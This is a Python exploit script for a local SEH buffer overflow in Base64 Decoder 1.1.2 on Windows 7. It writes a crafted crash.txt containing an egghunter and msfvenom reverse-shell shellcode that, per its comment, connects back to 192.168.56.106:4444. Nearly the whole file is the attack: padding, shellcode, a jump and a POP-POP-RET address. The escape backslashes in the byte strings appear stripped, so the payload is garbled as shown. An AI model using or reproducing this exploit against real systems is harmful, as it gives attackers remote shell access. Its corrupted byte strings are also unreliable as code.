#!/usr/bin/env python

# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 7 Professional SP1 x86
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070

junk="A" * 4
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b 'x00x0a'
buf = "w00tw00t"
buf += "xbdx82x38x76xeaxd9xcdxd9x74x24xf4x58x2b"
buf += "xc9xb1x52x83xe8xfcx31x68x0ex03xeax36x94"
buf += "x1fx16xaexdaxe0xe6x2fxbbx69x03x1exfbx0e"
buf += "x40x31xcbx45x04xbexa0x08xbcx35xc4x84xb3"
buf += "xfex63xf3xfaxffxd8xc7x9dx83x22x14x7dxbd"
buf += "xecx69x7cxfax11x83x2cx53x5dx36xc0xd0x2b"
buf += "x8bx6bxaaxbax8bx88x7bxbcxbax1fxf7xe7x1c"
buf += "x9exd4x93x14xb8x39x99xefx33x89x55xeex95"
buf += "xc3x96x5dxd8xebx64x9fx1dxcbx96xeax57x2f"
buf += "x2axedxacx4dxf0x78x36xf5x73xdax92x07x57"
buf += "xbdx51x0bx1cxc9x3dx08xa3x1ex36x34x28xa1"
buf += "x98xbcx6ax86x3cxe4x29xa7x65x40x9fxd8x75"
buf += "x2bx40x7dxfexc6x95x0cx5dx8fx5ax3dx5dx4f"
buf += "xf5x36x2ex7dx5axedxb8xcdx13x2bx3fx31x0e"
buf += "x8bxafxccxb1xecxe6x0axe5xbcx90xbbx86x56"
buf += "x60x43x53xf8x30xebx0cxb9xe0x4bxfdx51xea"
buf += "x43x22x41x15x8ex4bxe8xecx59xb4x45xd6xf3"
buf += "x5cx94x26x15xc1x11xc0x7fxe9x77x5bxe8x90"
buf += "xddx17x89x5dxc8x52x89xd6xffxa3x44x1fx75"
buf += "xb7x31xefxc0xe5x94xf0xfex81x7bx62x65x51"
buf += "xf5x9fx32x06x52x51x4bxc2x4exc8xe5xf0x92"
buf += "x8cxcexb0x48x6dxd0x39x1cxc9xf6x29xd8xd2"
buf += "xb2x1dxb4x84x6cxcbx72x7fxdfxa5x2cx2cx89"
buf += "x21xa8x1ex0ax37xb5x4axfcxd7x04x23xb9xe8"
buf += "xa9xa3x4dx91xd7x53xb1x48x5cx63xf8xd0xf5"
buf += "xecxa5x81x47x71x56x7cx8bx8cxd5x74x74x6b"
buf += "xc5xfdx71x37x41xeex0bx28x24x10xbfx49x6d"

junk += buf
print "filling with " + str(490-len(junk))
junk += "A" * (490 -len(junk))


junk+="x90x90x90x90"
junk+="x90x90x90x90"

# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b 'x00' -v egg
egg = ""
egg += "xb8x2ex04x6dx70xdbxd5xd9x74x24xf4x5ax2b"
egg += "xc9xb1x09x31x42x12x83xeaxfcx03x6cx0ax8f"
egg += "x85x16x93x85x99xd9xd1x4bx0cxe7x8dxa6xfe"
egg += "xdbx28x63x8bxccx8bxe4x43x22x98x83x73xed"
egg += "x15x7exd4x84x32x81xcc"
junk += egg

junk += "A"*(620-len(junk))
junk+="xebx80x90x90"
# POP-POP-RET is on 0x00401414
junk+="x14x14x40"
f=open("crash.txt", "w")
f.write(junk)
f.close